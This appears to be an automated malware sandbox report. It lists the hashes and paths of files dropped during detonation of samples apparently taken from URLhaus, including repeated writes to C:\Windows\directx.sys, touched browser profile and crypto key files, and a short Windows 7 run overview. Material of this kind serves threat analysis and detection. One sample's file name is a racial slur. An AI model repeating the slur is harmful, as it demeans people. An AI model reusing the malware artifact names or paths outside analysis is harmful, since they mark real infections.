SHA512 84944d132fb47be7d22e55456bc1c4bbb93ce281b775e57641a012602f77219c6a9c75ed67ca1fbec1ee15550dee58b9a8adeacbe136e58d2ed1f4c6b755fd54

C:\Users\Admin\Downloads\UrlHausFiles\cryyy.exe

MD5 0f103ba48d169f87b6d066ca88bc03c1
SHA1 c0a175142d2b0793c653be23b83a4df2a0c9fc1c
SHA256 925c5c0d232f0b735e1eb0823890fe8b40c01d93f976a58ec605f36997c25079
SHA512 73a093d14abac8423061e48d07937ffbc8f20d55ca4907573cc015c3b0beaaa7d03f4c2382ab22d1ab5136cc2464dbe5150608054a3eb449cbbd50b278f26884

C:\Users\Admin\Downloads\UrlHausFiles\app64.exe

MD5 40b887735996fc88f47650c322273a25
SHA1 e2f583114fcd22b2083ec78f42cc185fb89dd1ff
SHA256 d762fccbc10d8a1c8c1c62e50bce8a4289c212b5bb4f1fe50f6fd7dd3772b14a
SHA512 5dd81a17725c0fb9dae4341e4d5f46ba1035fdba2786a15b5288b4281cd7b0741889a6813da2f797a2581fed08d0f407b6fad0315bdac50ff62c94cb7a7ead13

C:\Users\Admin\Downloads\UrlHausFiles\keygen.exe

MD5 3bd08acd4079d75290eb1fb0c34ff700
SHA1 84d4d570c228271f14e42bbb96702330cc8c8c2d
SHA256 4d3d060d8ec7089acfb4ba233d6f2a00a910503be648709a97714c84a80cccd8
SHA512 42309b28e5bf15ee9a4708ffcdb18ef2925d4b51151dab75168d3578db538b658c706cd77bfceae9a927516d3fb4b4bd3356e0ee066af5aaeadaa00ecff9a760

C:\Users\Admin\Downloads\UrlHausFiles\a.exe

MD5 ff370f449a6e83018df4b4163380fc57
SHA1 012c030503055803fd192c60dcc9e4733f917025
SHA256 1aa867bb4fb60de654e5e166c0a0e45c3b131a0131484c6b8888fea501c37b3a
SHA512 b0b41d5b391f6cfd582830abe132b87dc9434768c78dca90b3b8aaffe40880f6bb07a120b60cd4832e72202ea7c8257f4ec20d0b152136f6fc1ceb0a2b23ad7e

C:\Users\Admin\Downloads\UrlHausFiles\abc.exe

MD5 37fa8c1482b10ddd35ecf5ebe8cb570e
SHA1 7d1d9a99ecc4e834249f2b0774f1a96605b01e50
SHA256 4d2eaca742a1d43705097414144921ae269413efa6a2d978e0dbf8a626da919c
SHA512 a7b7341c4a6c332aef1ffb59d9b6c5e56ec7d6c1cb0eff106c8e03896de3b3729c724a6c64b5bf85af8272bd6cf20d000b7a5433a2871403dd95cca5d96ebd36

C:\Users\Admin\Downloads\UrlHausFiles\MJPVgHw.exe

MD5 031377e4e34dcd19917fac02ff6da79f
SHA1 0fcccffee83cbb77a87ca1b55abc8e18fb267afc
SHA256 d58061a43df6b63e97421904c066ed5ad4b87a3733c250e105e83bc7154d9414
SHA512 f682a314a74dad1269dc1d948dc0c4773eb08e76ab364c3d5a9893577395126e5a409fca18cab24378e95fa71b8d96e20ad22e644275daf3f997edf8592da5c4

C:\Users\Admin\Downloads\UrlHausFiles\three-daisies.exe

MD5 c8a83fc92e8a31bebb4bdef41ab8ec0c
SHA1 985580171c1ddb1fbfb21008ffe056447039e469
SHA256 fbb82dc29a6173818fc34acf9e12ec9425a862cde9db69f7f973f5255c28981d
SHA512 32180ae25d8e7549aba61a7ac124ed587ae0c25be2e962e9698ecf6b9c4a904ae114f6ac4ec88ffb2aa16546de0476049ba92484fd772de2b3ac53c9c37cdbb4

C:\Users\Admin\AppData\Local\Temp\GSE1B0.tmp

MD5 7d46ea623eba5073b7e3a2834fe58cc9
SHA1 29ad585cdf812c92a7f07ab2e124a0d2721fe727
SHA256 4ebf13835a117a2551d80352ca532f6596e6f2729e41b3de7015db558429dea5
SHA512 a1e5724d035debf31b1b1be45e3dc8432428b7893d2bfc8611571abbf3bcd9f08cb36f585671a8a2baa6bcf7f4b4fe39ba60417631897b4e4154561b396947ca

C:\Users\Admin\Downloads\UrlHausFiles\SQL2019-SSEI-Dev.exe

MD5 54c804c8f597748ce17394624b6c08a4
SHA1 4afa779208e5fa47630a8c4a17107e54db2234f5
SHA256 6163a3302b0eb60ff371116b0e90de30df65493ac7192235d4495e43c4a41d4f
SHA512 17ef71946a361962fc1747d78b60bb481574fba96b079cc3f7b2f220fa36db506cecd3ef9729c84c4e20b9c04b50ec766431d5dce0e21b8f2a15037750003384

C:\Users\Admin\AppData\Local\Temp\3582-490\SQL2019-SSEI-Dev.exe

MD5 0066f98970748d1173343ecb8efcb60f
SHA1 b849377f56b23bedd094b3069f645542f095b782
SHA256 fdec686409d94188a755f39cb793f93fd2f0b62e99bc13ea9a63e1f3dd78c8a1
SHA512 fd805eb1e9be1bebe114d3e069fd387e337b620b003425d824debf5426111f97138b2e654e467b41983685c634d485edfc8434ad6217197d1266925f5ede9b1a

C:\Users\Admin\Downloads\UrlHausFiles\mimilove.exe

MD5 c67f3497c310c01018f599b3eebae99e
SHA1 d73e52e55b1ad65015886b3a01b1cc27c87e9952
SHA256 cc585d962904351ce1d92195b0fc79034dc3b13144f7c7ff24cd9f768b25e9ef
SHA512 1205b5a9a9d2f3fabcce7e53e70e4efce08b21469ae64120beaee67a828d12eeeecddc623b453105ed15990fcc7bbce53175eca6545007f9d68c0aee66e55bc0

C:\Users\Admin\Downloads\UrlHausFiles\KuwaitSetupHockey.exe

MD5 7f69b1fa6c0a0fe8252b40794adc49c6
SHA1 5d1b7a341b1af20eae2cae8732f902a87a04b12b
SHA256 68662d24f56c624dee35c36010f923a8bf8d14b8c779ad3dafe8dd6b81bb3431
SHA512 6a9e13e0b1c1b0c8fbf41c94147c7cf16a41af7bd656dc606c1ca1dc8bc0986785252155661d19cc2f9ec35b26fb47456d842bc5fdf469bdd09f72d48b3a5256

C:\Users\Admin\Downloads\UrlHausFiles\bp.exe

MD5 6733c804b5acf9b6746712bafaca17da
SHA1 78a90f5550f9fd0f4e74fea4391614901abb94fc
SHA256 ce68786d9fcb2e0932dbd0cba735690dfd3a505158396ed55fd4bb81b028ace0
SHA512 9e1c72d081b3aaed9f8ec97f7a5ed5e8b828b92ee8fd3e1ebb98834b0ba8008110fca97456354a281afcaed351d5a9625ea4a225394f524070ad028c9f221b41

C:\Windows\directx.sys

MD5 a46204336dd420f2e228bc7eb70a83b4
SHA1 195001e17848f59a3bc4bfef2da14376551a9edf
SHA256 cf43ca8a41663426496658c2fc0cf90c3dfd9cc6d46391990d2d05a9afe497be
SHA512 6bb09127012591d4c96fd14bdbb8d9ce3623d347d61ccb7eb943c470196da2e7fd815f06d6467641a60f2987892271eef083b7a76e02172d56baffdf11c32a92

C:\Users\Admin\Downloads\UrlHausFiles\key.exe

MD5 88172b4e193807dfcad3ae22066f5551
SHA1 d77dd1628445d9c0ed3d4249780e7c399c3cf43c
SHA256 e836ad22a227a0429136ea60905a1d790e9bf0ee6add164c4cb932361e6a1756
SHA512 091da6ed210c5886bb9eaa35ac42b23e5f6afe08127866dd9365bcd9e37b1c01fd9c7ad291c79a714a05889cd36b09c80b7a0e3b6ed9410666d5e45ec64db709

C:\Windows\directx.sys

MD5 3fed942b1d8f6f294d17262b8f49e3ed
SHA1 27afda568f687be798ec03ce650a56dafcf46d62
SHA256 39ab8f9f4ca4352a5301e9d2d1e17d467dcf970d977dea5578bc91e0a9c4714b
SHA512 b6e01a9a90ff9f9b74297624c74d02e208c2e15bc79d579c67ffa8096bf3b3d4ae3d3f92b6eabb169b3ffbe30c0646efda1a58203e60ab72210e7b15ca65a716

C:\Windows\directx.sys

MD5 b188607e7e50e8146308f7e29b9131bb
SHA1 70d7e5f44a822d4c3232fc4ff9d8655a7d8120e0
SHA256 c92f9fbd1b5284eb410750f0a1e267c33d505db0d298a4172da28a0e9ceead84
SHA512 d03973421591f217606b85d56ede9425ee1ea64bcca77e3b8fe83022f11abeb1f90ffba8d99a42f691aec7ccc57e45d2a81e8abeba31160559c1b7ed5490fb40

C:\Windows\directx.sys

MD5 013117a815d9156ee0f160ad86d2795b
SHA1 5942da6df5d03f8bd55d48cb4ee208b0c44a0da8
SHA256 0b6eb75225619743b7c6caaa957cc877e3cf8d91829e206679de9fe1f3ef7af6
SHA512 e7e9d76eba5f5bd5429a6776d36331fb76c630172f2e83fa0abdf7915b399bf7bd2011dccde9a85e2b6f9f4bd6cb46f287307d48254d30518cb341475cf87c74

C:\Windows\directx.sys

MD5 d2d340e22ba5156f5d603db97ca09e7a
SHA1 1a491201f8ca0edb3ffe54ca1a3cddc50abf661e
SHA256 e564a371f457a1c420061a8e4f848ae1348d93bf926a32a753233f9f1a2b8eb3
SHA512 33027b3f47f8e005f210f145710f8e62083f08895340e0e6af1b9e9f3e921214502b877ebd29653973c899a5e2ee44c4b858d86f5be29cb0c712519c38d26086

C:\Windows\directx.sys

MD5 032fe683975a999361fe06066771b2d0
SHA1 bfa5cb874bb68bf45513900fff322885d2f6efd7
SHA256 6f4ed9bdc3a368fd0c113dbf51ab80e2b83eadb5ec1f2913b4f1625f9d7fccaf
SHA512 06db896c487d2c7960603319c6c1d0f934ee10d76775cbfb23961576e253513a3d24c6648ba856e84d978d1240da805fb36fae5b2b7a6f89bed786191e48183e

C:\Windows\directx.sys

MD5 eb96d500aa783c60f3a5cfb61bbca211
SHA1 0a31d03b75e4f39097c1bdc010dbb59d818ec36a
SHA256 a774b5d7c7985d1e6e977d24233f0f6dce5c04ae113243389a121117ef66fc28
SHA512 9284ca8ed8369365ec4ee284bd0a475536aecb620e2bfcdfbbf533139e122797818bbc930886292563f0e8b867c60b809fa69f03f1b02775b36809cf15b103fb

C:\Users\Admin\Downloads\UrlHausFiles\new.exe

MD5 4c2a997fa2661fbfe14db1233b16364c
SHA1 e48025dbd61de286e13b25b144bf4da5da62761a
SHA256 c2a299f988158d07a573a21621b00b1577b7c232f91c1442ba30d272e4414c5d
SHA512 529a26f4769c7be0986e16d8e0bf37632b7b723a3e8d9fa8bb3f9cc4d766bd4d24a802d6aa43fe4df85c23cd680b0188c7e1eaff443a30203b298ba916aa0a57

C:\Windows\directx.sys

MD5 0877a594f8c8ce92ac2af1b88d35da32
SHA1 6b7b907a2b68db647046b13e4290f5f69c0d1d96
SHA256 05a78a773374fdad30a8f7eae0e082d61b86c5cadd1ab91ba8e1b315bab08a04
SHA512 7778c68916253215a37f5cefcdb8c4bdbb11ba72fd633fa0d5c3b2533941d8bda87a4311a2a1c59361aa54e70516d5bc27309c74f0e5be685ed0f98108a64b8c

C:\Users\Admin\AppData\Local\Temp\F392.tmp.x.exe

MD5 97eb7baa28471ec31e5373fcd7b8c880
SHA1 397efcd2fae0589e9e29fc2153ffb18a86a9b709
SHA256 9053b6bbaf941a840a7af09753889873e51f9b15507990979537b6c982d618cb
SHA512 323389357a9ffc5e96f5d6ef78ceb2ec5c62e4dcc1e868524b4188aff2497810ad16de84e498a3e49640ad0d58eadf2ba9c6ec24e512aa64d319331f003d7ced

C:\Windows\directx.sys

MD5 ce22c312e0691c53668d72e196fb1156
SHA1 fdcd7ab1dd20064f05b109cb07f0b1c2bb88d2f9
SHA256 fae76dceecde72ec87e3e8ebc03eafe92c17e6d8ff04d9a3b21d98b60659bd67
SHA512 e8d62b220c4cd1adc2aa79a9e6000615f41304ea8caa37c36ef714c5720ac78127f61edb00dadaddf633380c3da129d37d80d3cf56e9bb960ef568dde8955322

C:\Windows\directx.sys

MD5 30e530c6133d9a3cff77cd38967dddae
SHA1 5010fa7e0ed21c99699013b14e7bfba55b58bf72
SHA256 984761661c727199f1a8b1a8cdf063629a1e24e721492720ff1ee748948b5795
SHA512 5f219bd4e85d8fa1a6c62a87d5f34f951e0133364fc098fbea698eab476ce46989ee2b3022a4b1bdf04e2679c50019d960f3a3df9acf4b8af85bf4c3e8767fdc

C:\Users\Admin\Downloads\UrlHausFiles\chisel.exe

MD5 ca7d144217321a024dcc6fdd636306c8
SHA1 9ea9214be276f28e21d409c1aa30388b3994a660
SHA256 03b424d1ce73c9c4130b522a344ab2b0d2a8706fdbd5acb92edd4f47d46dde0d
SHA512 05b845f640a4ca3f4c4dbc21ff674f9be8513745793df49baab4f2d1df2f737d0b40ba4567b6b3df446b84ce4589bb2110f708a104b21afc3900c889c985719d

C:\Windows\directx.sys

MD5 53776f419b0d8123e3b7b16239ddc30b
SHA1 454523fbd526fb78cd813051bc3ca42c63bd8133
SHA256 666e7c708c0430a398248f6540da9a84976bff4eec256f5c65687932ea7ceb97
SHA512 47daeee7b21636126c2d44c9bd472b6eed6631648e37d339cbd89ed73e581ad570bb4adc0669fff5d3bc68d3fe741ff9dab4ad1480d3d03693c10d1fef3a73e5

C:\Users\Admin\Downloads\UrlHausFiles\jeditor.exe

MD5 581a9eb520eff140ee0f3d266abe6291
SHA1 fb3ecc2ecd801fc34e67c4f9e8f99db4760465bc
SHA256 5b138b76f61c815de8fdfaf80a99afe1e8a9c19ba29e25736e691664242dce4a
SHA512 10e5bc90c764005f704adf3e80b6c08c7ec4e0517ac185b87d647b5a04b9855e3ede3bd9085883fbaf76d230ef236c3788d8da5e1abc038008e3bf094b90f7e7

C:\Users\Admin\Downloads\UrlHausFiles\Beefy.exe

MD5 8d644c8cb9c08d33b5efc8e05a8f11dd
SHA1 a49b9fd9d7f04bdac19a86b622e4e569bb1650e1
SHA256 af345887a4ce62f171ce80e9b33e15162084005c0822043cfb98d184f59564c2
SHA512 6a76a8a0d51d39d4a9d0c3fc8d3e4d9fc02447d581aa4e3764d1954aa24af2cbf1aa226501a2ceb77fb2bf17f7e782a71762bf80f4fda706e58b8eb5a928da61

C:\Users\Admin\Downloads\UrlHausFiles\chromedump.exe

MD5 e468cade55308ee32359e2d1a88506ef
SHA1 278eb15a04c93a90f3f5ef7f88641f0f41fac5bc
SHA256 f618e9fa05c392501fb76415d64007225fe20baddc9f1a2dcc9ff3599473a8eb
SHA512 82fef308bc65616efb77b3f97ff7fcd14623a3955d18a9afff5c086d85d0f2e6856468ad992da2fb01aae6488afb0c0cdb80744cc20d74d3af851f35d30947d6

C:\Windows\directx.sys

MD5 97b656641ae387aafc3e52acb4dcbc94
SHA1 1b7296a3347daf8bb87bc71094f33a79bc279d2b
SHA256 5cde90ffa1563e07b6c90493300ee62c4dcc5654f5f2857723bc2c30e6d7f73f
SHA512 45da976165214d112fda5db60fcbf77960cf2687d99936a79ce45c583e4e9bb5140470a90e4256dabc0c7501fd2e9b95072ffbd0f57b6581917764ed2f8869f5

C:\Users\Admin\Downloads\UrlHausFiles\test26.exe

MD5 b9054fcd207162b0728b5dfae1485bb7
SHA1 a687dc87c8fb69c7a6632c990145ae8d598113ce
SHA256 db032c18992b20def16589678eb07e0d3f74e971f4efc07196d7cd70a16753bc
SHA512 76e33c6b965ffb47f0a2838ca0571134cdf32ab9f6808bc21e6ca060b4d23e15cd686bd6d57571dbc613aa6e17a3702264079f2bc411de1a72a7d1e01afc469f

C:\Windows\directx.sys

MD5 23725739b75dca73fac0b072fbbc80a6
SHA1 1a8300942b91ccb6e7eae0662d79ce230ce3d05d
SHA256 3eaab030d5175e257dcc2d963018c0a08b51d8c10633acdf9a2aa594615aa893
SHA512 e51b9ee66ee373802e40d98d0a980383f5ffe404be1948d262e06aff5de249db6602fa35a0b7c3d01ed285e97e00a1777a692feb1b077d344ebc01dcd52f67f4

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

MD5 d751713988987e9331980363e24189ce
SHA1 97d170e1550eee4afc0af065b78cda302a97674c
SHA256 4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945
SHA512 b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

C:\Users\Admin\Downloads\UrlHausFiles\Taskmgr.exe

MD5 ea257066a195cc1bc1ea398e239006b2
SHA1 fce1cd214c17cf3a56233299bf8808a46b639ae1
SHA256 81e95eaca372c94265746b08aac50120c45e6baae7c521a8a23dd0dfdc3b9410
SHA512 57c01e41e30259632ffbe35a7c07cc8b81524ca26320605750a418e0e75f229d2704ae226106147d727fe6330bc5268f7a2a9838fa2e7b0178eadf056682a12f

C:\Windows\directx.sys

MD5 d827ab5ce62fa1a13599e44c2b5eb68c
SHA1 eb1b2eef98d326bb819789bdb6bb61d150b0838d
SHA256 3b35dacf3f18db408eedb34a19de355aba0057b9e541bd47e1cc8922468d861d
SHA512 c70fa32ca445d4ef38d8b31f2f028dfaf7c423e1101917c0646ec0515bc5fe250e25218165b658588984b5fae7cb873d880739cddd69c2b76a6583d05b1c4dca

C:\Users\Admin\Downloads\UrlHausFiles\xblkpfZ8Y4.exe

MD5 45fe36d03ea2a066f6dd061c0f11f829
SHA1 6e45a340c41c62cd51c5e6f3b024a73c7ac85f88
SHA256 832640671878e0d9a061d97288ffaae303ba3b4858ed5d675c2170e7770ec8a6
SHA512 c8676bd022fae62a2c03932dd874da8482168698fc99987c8d724b5302f75131839b5b3b6f8288b823c5bb732918f6bc49c377116bb78825807de45b6a10026f

C:\Windows\directx.sys

MD5 1b96c1917e08eecf75efb96ff8b32aa6
SHA1 f0b531b22bd2062fce3c929c6a56c59bcb3fd0a8
SHA256 4ea936a86f4bfb1564d3b0c4c138c00cf9871dd1605278c3a5a2cc20d2cdbe3b
SHA512 be6cf664bf7254a760d1eae8fab20a61a1342122a1ab861b20a68c3a1814e861e35b9d3ac76bd0ae6a6b19721df4987eee2b636a084f5f9a38f46cd872b2ed12

C:\Windows\directx.sys

MD5 11a2c8e8eee73c8292af4c68c87d3f95
SHA1 bfe972e24fc5084e4118a1ab77288c06139e3d76
SHA256 4f9265944e086641d540c2e7ef4c263ec58373801f607d8c995d1e1a4393ddb6
SHA512 69d5e639c61c383eccd21880ae191099fc993bcd5faee05595ad0553ef995d8b813ba296c4fe4e14f55501fcf4a9868c8c7a33ef0529fdcb7fe75a99dec7512c

C:\Windows\directx.sys

MD5 afc2d2378b42846f16157d8eca5e7792
SHA1 2b46cb980c2a731f7190e2d6354fc9b26b396ed5
SHA256 d72d95dac3332bcb7a184faed3bec309027001c85c38e6d9199447c0fbbd6887
SHA512 1810507b400025fb2232a714c16ef60fdab97c25937f38523ac16f1a7db6a32e4e44a8a94d758f1e025a156970d3503183b98b93cba3c27817411ffd0fda0998

C:\Users\Admin\Downloads\UrlHausFiles\file.exe

MD5 f7f61ffb8e1f1e272bdf4d326086e760
SHA1 452117f31370a5585d8615fc42bc31fdbe32a348
SHA256 e98ae7f96f7cee07ef93b3c98ccae81c66b29e4ede046112e200bf7c152fa9af
SHA512 158fe3a916f761d766acb75da048b6e224a18d8aadde24af238e6c94be117ff2639463cb4b78c8642a3980d1b9e130741023a848853bca135e8f1fcba481305f

C:\Windows\directx.sys

MD5 71c53284102c537be6cfce6ae7651ee7
SHA1 7fafbff525c79fe71b5d973fc02ef632b73e1d6c
SHA256 945128d038b443ef9ffb54e345303960c006839b522de30e9672c616b6ad02cc
SHA512 4011a598e57ba7855be70bc714055a66f2995ce853e31833dca3c3256d8cf84b88cd8719dfba2ecbef8902401264c39f531a2b09e1d482ee5fb390361352e614

C:\Windows\directx.sys

MD5 1e96152ca7879c668814acc782c6b7d3
SHA1 40b27bfe1916a118377de4c75eff3e1b17235227
SHA256 b8e242ebf7e5a859f51a36891e8b5205f0b8e24b3a81fcdd347fb9e990022583
SHA512 fac30b63ed52083c17a3c0cb72c068bb4f11c9495c394b65055eb2bdac2709afc863459bab7aafbb0a9f4c603b4b67da81d03bdd4a487bfdc2490d1c19c9df10

C:\Windows\directx.sys

MD5 fde174c194bf224ecfe20795a81699d0
SHA1 806b0aa1c12ef8df269ca9b9a7e68764e2c93c5a
SHA256 f0429b79c4a9fe6345cfef9f1219cd01d306a59204a0cfaa91d168dbe91b804c
SHA512 fcd33cca95b14d0e7380b91fa70b087a9538f8cbc2dd1079bee98bb0b01658dd19637a1cb1055963ca91f0fd5efe2e0fddbdda2124a20af8e75ceeb5559ff962

C:\Users\Admin\Downloads\UrlHausFiles\ipscan.exe

MD5 6c1bcf0b1297689c8c4c12cc70996a75
SHA1 9d99a2446aa54f00af0b049f54afa52617a6a473
SHA256 40dc213fe4551740e12cac575a9880753a9dacd510533f31bd7f635e743a7605
SHA512 7edf53adf8db463658aa4a966cf9e22bf28583cb0ca4317af19e90d85232b6cb627e810033155383948d36ad6a1a14f32b3381d10c7cd6c4bd0482c974c129db

C:\Windows\directx.sys

MD5 c73628947e54e0f324e1139e11a3a5d9
SHA1 30bf3de09ceecb2f4ee2bd16079ca10b0d58248b
SHA256 4e03e371e1cbb5cac32c440af90b54d5d82f0998e8d33fb64959e8fb3252f27c
SHA512 8d6985d5e28a2abe8c64a53fdd66b7517dedcdc077aee48fc5fb1991ffe04a205754a9df7956351e933446c124d5c647f834d75185c221d11528e625f94d848f

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\a2f3c859-93c3-4baa-9f22-bd5f5b6244b7.tmp

MD5 5058f1af8388633f609cadb75a75dc9d
SHA1 3a52ce780950d4d969792a2559cd519d7ee8c727
SHA256 cdb4ee2aea69cc6a83331bbe96dc2caa9a299d21329efb0336fc02a82e1839a8
SHA512 0b61241d7c17bcbb1baee7094d14b7c451efecc7ffcbd92598a0f13d313cc9ebc2a07e61f007baf58fbf94ff9a8695bdd5cae7ce03bbf1e94e93613a00f25f21

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Preferences

MD5 a492189da88fa2e46fff2f204c7b60ac
SHA1 f4c43854809d78e9e36400de22702e2e06cdef29
SHA256 e171ebf6b6df011253ccff0fb9edd57cccf408388426fe5aac4967f8cfd0d330
SHA512 278cadda6403e483c177827a4229fed6354d03a68ebd3dbc494704f1b993440594f5ba32c39c571fe62b338885ada24c305eabd09c5cf0d4918c105cfa080ed7

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e

MD5 c07225d4e7d01d31042965f048728a0a
SHA1 69d70b340fd9f44c89adb9a2278df84faa9906b7
SHA256 8c136c7ae08020ad16fd1928e36ad335ddef8b85906d66b712fff049aa57dc9a
SHA512 23d3cea738e1abf561320847c39dadc8b5794d7bd8761b0457956f827a17ad2556118b909a3e6929db79980ccf156a6f58ac823cf88329e62417d2807b34b64b

C:\Users\Admin\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3350944739-639801879-157714471-1000\0f5007522459c86e95ffcc62f32308f1_dd2803c7-d377-4f06-bdfe-aea230fc7b0e

MD5 d898504a722bff1524134c6ab6a5eaa5
SHA1 e0fdc90c2ca2a0219c99d2758e68c18875a3e11e
SHA256 878f32f76b159494f5a39f9321616c6068cdb82e88df89bcc739bbc1ea78e1f9
SHA512 26a4398bffb0c0aef9a6ec53cd3367a2d0abf2f70097f711bbbf1e9e32fd9f1a72121691bb6a39eeb55d596edd527934e541b4defb3b1426b1d1a6429804dc61

C:\Windows\directx.sys

MD5 c052df275d34357e8a69f1ef2990d16d
SHA1 a4cb4b778dc7d829a8a49f9e574fe18864bc6a3d
SHA256 7026130a1809b971c95d899ef48a50998f27b4045a18897de16efc5b1c701ca9
SHA512 659e779d984168d1c1bc5b9cdaf6ec04fc664767126a943100a84a3594ae9ff5164206c3c8fff84fb3d8c87387036c1f705dd6a740174ecfdbf254de53daa01c

Analysis: behavioral1

Detonation Overview

Submitted

2024-12-04 13:02

Reported

2024-12-04 13:05

Platform

win7-20240903-en

Max time kernel

122s

Max time network

126s

Command Line

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Signatures

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\niggers.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

C:\Users\Admin\AppData\Local\Temp\niggers.exe

"C:\Users\Admin\AppData\Local\Temp\niggers.exe"

Network

N/A

Files

C:\Users\Admin\AppData\Local\Temp\_MEI17522\python311.dll

MD5 9a24c8c35e4ac4b1597124c1dcbebe0f
SHA1 f59782a4923a30118b97e01a7f8db69b92d8382a
SHA256 a0cf640e756875c25c12b4a38ba5f2772e8e512036e2ac59eb8567bf05ffbfb7
SHA512 9d9336bf1f0d3bc9ce4a636a5f4e52c5f9487f51f00614fc4a34854a315ce7ea8be328153812dbd67c45c75001818fa63317eba15a6c9a024fa9f2cab163165b